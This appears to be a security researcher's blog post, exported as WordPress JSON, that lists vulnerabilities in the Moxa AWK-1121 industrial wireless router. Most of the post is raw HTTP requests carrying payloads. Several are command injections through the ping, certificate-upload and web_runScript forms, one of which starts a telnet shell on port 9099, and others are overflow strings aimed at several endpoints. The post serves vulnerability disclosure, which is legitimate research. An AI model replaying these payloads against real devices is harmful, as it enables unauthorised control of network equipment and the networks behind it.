{"id":245,"date":"2024-07-07T16:55:36","date_gmt":"2024-07-07T16:55:36","guid":{"rendered":"https:\/\/www.samuelhuntley.com\/?p=245"},"modified":"2024-07-07T16:55:36","modified_gmt":"2024-07-07T16:55:36","slug":"moxa_awk_1121-router-vulnerabilities","status":"publish","type":"post","link":"https:\/\/www.samuelhuntley.com\/?p=245","title":{"rendered":"Moxa_AWK_1121 Router Vulnerabilities"},"content":{"rendered":"

This page contains all the vulnerabilities identified in Moxa Router “Moxa_AWK_1121”. <\/strong>Also these vulnerabilities are described here<\/a><\/p>\n

1. Command injection in Ping command allowed after login with admin\/root. Use the IE browser for this one. Also this is a blind injection when worked \r\n\r\n\tPOST \/forms\/webSetPingTrace HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\tReferer: http:\/\/192.168.127.253\/ping_trace.asp\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tContent-Length: 86\r\n\tHost: 192.168.127.253\r\n\tPragma: no-cache\r\n\tCookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\r\n\tConnection: close\r\n\r\n\tsrvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp\r\n\t\r\n\t\r\n\t# Displays the output now (192.168.127.101;echo `ls -1 \/usr\/webs`#)\r\n\t\r\n\t\tPOST \/forms\/webSetPingTrace HTTP\/1.1\r\n\t\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\t\tReferer: http:\/\/192.168.127.253\/ping_trace.asp\r\n\t\tAccept-Language: en-US\r\n\t\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\t\tContent-Type: application\/x-www-form-urlencoded\r\n\t\tContent-Length: 72\r\n\t\tHost: 192.168.127.253\r\n\t\tPragma: no-cache\r\n\t\tCookie: Password508=2204b322d9fe931fa9ef299987e9de47\r\n\t\tConnection: close\r\n\r\n\t\tsrvName=192.168.127.101;echo `ls -l`##&option=0&bkpath=%2Fping_trace.asp\r\n\t\tsrvName=192.168.127.101;telnetd -l\/bin\/sh -p9099##&option=0&bkpath=%2Fping_trace.asp\r\n\t\r\n\t\r\n2. Open wireless, so anyone can connect and give himself an ip address in range 192.168.127.xxx and use 192.168.127.253 as gateway NEW FIREMWARE\r\n\r\n3. No HTTPOnly flag on Cookie NEW FIREMWARE\r\n\r\n4. No SSL on HTTP which means anyone can see the traffic and having open wireless makes it even worse \r\n\r\n5. Default Telnet and SSH enabled with same creds admin\/root by default \r\n\r\n6. Config.ini can be downloaded clear text file \r\n\r\n7. CSRF systemic \r\n\r\n9. Possible Stack overflow in iw_system using 516 As and overflows at YYYY below  \r\n\r\n\tPOST \/forms\/webSetPingTrace HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\tReferer: http:\/\/192.168.127.253\/ping_trace.asp\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tContent-Length: 622\r\n\tHost: 192.168.127.253\r\n\tPragma: no-cache\r\n\tCookie: Password508=6d86219d9cca208c1085cce81fdd31f0\r\n\tConnection: close\r\n\r\n\tsrvName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBLLLLZZZZXXXXYYYYKKKKCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEE&option=0&bkpath=%2Fping_trace.asp\r\n\t\r\n10. Possible memory corruption mostly can be stack overflow in sending mail or DOS as BBBC goes in r3 for this one in core2 or core3 and you are stopped executing web_extract_params from [r3,something] so needs right address there to overflow the stack, but right now DOS \r\n\r\n\r\n\tPOST \/forms\/web_SendTestEmail HTTP\/1.1\r\n\tAccept: *\/*\r\n\tContent-type: application\/x-www-form-urlencoded\r\n\tReferer: http:\/\/192.168.127.253\/email_server.asp\r\n\tAccept-Language: en-us\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: 192.168.127.253\r\n\tContent-Length: 752\r\n\tPragma: no-cache\r\n\tCookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\r\n\tConnection: close\r\n\r\n\tserver=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDDEEEEFFFFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n\t\r\n11. Command injection in iw_certvalidate in iwlib by using pasword for certfiel wrong  \r\n\r\n\tHowever CSRF_FI.html does not send cookies when sending the POST request with file contents.  and it sends only in FF and Chrome, Not in IE but still without cookies. \r\n\t\r\n\tBut an internal user can control the router after logging in to the router\r\n\t\r\n\tPOST \/forms\/web_certUpload HTTP\/1.1\r\n\tHost: 192.168.127.253\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\/20100101 Firefox\/59.0\r\n\tAccept: *\/*\r\n\tAccept-Language: en-US,en;q=0.5\r\n\tCookie: Password508=68abf30ef8176a4248320929e04df562\r\n\tContent-Length: 899\r\n\tContent-Type: multipart\/form-data; boundary=---------------------------114782935826962\r\n\tOrigin: null\r\n\tConnection: close\r\n\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"iw_privatePass\"\r\n\r\n\t;`ping -c 9 192.168.127.103` ##\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"bkpath\"\r\n\r\n\t\/wireless_cert.asp?index=1\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"certSection\"\r\n\r\n\tcertWlan\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"rfindex\"\r\n\r\n\t0\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"Submit\"\r\n\r\n\tSubmit\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"certFile1\"\r\n\r\n\ttest.txt\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\r\n\tContent-Type: text\/xml\r\n\r\n\t<a id=\"a\"><b id=\"b\">hey!<\/b><\/a>\r\n\t-----------------------------114782935826962--\r\n\r\n12. No authz on http:\/\/192.168.127.253\/\/systemlog.log \r\n\r\n13. Sprintf based BO in 0x00039518 web_runScript API call \r\n\r\n\tPOST \/forms\/web_runScript HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\tReferer: http:\/\/192.168.127.253\/Troubleshooting.asp\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Type: multipart\/form-data; boundary=---------------------------7e21a62f2905ca\r\n\tContent-Length: 718\r\n\tHost: 192.168.127.253\r\n\tPragma: no-cache\r\n\tCookie: Password508=071b1093656adca3510d5e32f69737ec\r\n\tConnection: close\r\n\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\r\n\tContent-Type: application\/octet-stream\r\n\r\n\tls -ltr\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_storage\"\r\n\r\n\ttftp\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_serverip\"\r\n\r\n\t`ping -c 3 192.168.127.101`\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"bkpath\"\r\n\r\n\t\/Troubleshooting.asp\r\n\t-----------------------------7e21a62f2905ca--\r\n\r\n14. Memory corruption in web_runscript \r\n\r\n\tPOST \/forms\/web_runScript HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\tReferer: http:\/\/192.168.127.253\/Troubleshooting.asp\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Type: multipart\/form-data; boundary=---------------------------7e21a62f2905ca\r\n\tContent-Length: 1013\r\n\tHost: 192.168.127.253\r\n\tPragma: no-cache\r\n\tCookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\r\n\tConnection: close\r\n\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\r\n\tContent-Type: application\/octet-stream\r\n\r\n\tls -ltr\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_storage\"\r\n\r\n\ttftp\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_serverip\"\r\n\r\n\tAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIAAAAAAAAAAAABBBBCCCCDDDDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIAAAAAAAAAAAABBBBCCCCDDDDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIAAAAAAAAAAAABBBBCCCCDDDD\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"bkpath\"\r\n\r\n\t\/Troubleshooting.asp\r\n\t-----------------------------7e21a62f2905ca--\r\n\t\r\n15. CMD INJ in web_runscript \r\n\r\n\tPOST \/forms\/web_runScript HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\tReferer: http:\/\/192.168.127.253\/Troubleshooting.asp\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Type: multipart\/form-data; boundary=---------------------------7e21a62f2905ca\r\n\tContent-Length: 560\r\n\tHost: 192.168.127.253\r\n\tPragma: no-cache\r\n\tCookie: Password508=c598615e6217711824c76cb6f2360e49\r\n\tConnection: close\r\n\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_filename\"; filename=\"`ping -c 9 192.168.127.101`\"\r\n\tContent-Type: application\/octet-stream\r\n\r\n\tls -ltr\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_storage\"\r\n\r\n\ttftp\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_serverip\"\r\n\r\n\t1111\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"bkpath\"\r\n\r\n\t\/Troubleshooting.asp\r\n\t-----------------------------7e21a62f2905ca--\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
This page contains all the vulnerabilities identified in Moxa Router “Moxa_AWK_1121”. Also these vulnerabilities are described here 1. Command injection in Ping command allowed after login with admin\/root. Use the IE browser for this one. Also this is a blind injection when worked POST \/forms\/webSetPingTrace HTTP\/1.1 Accept: text\/html, application\/xhtml+xml, image\/jxr, *\/* Referer: http:\/\/192.168.127.253\/ping_trace.asp Accept-Language: en-US … Continue reading Moxa_AWK_1121 Router Vulnerabilities<\/span> →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[23],"tags":[],"_links":{"self":[{"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/posts\/245"}],"collection":[{"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=245"}],"version-history":[{"count":1,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/posts\/245\/revisions"}],"predecessor-version":[{"id":246,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/posts\/245\/revisions\/246"}],"wp:attachment":[{"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=245"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=245"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=245"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}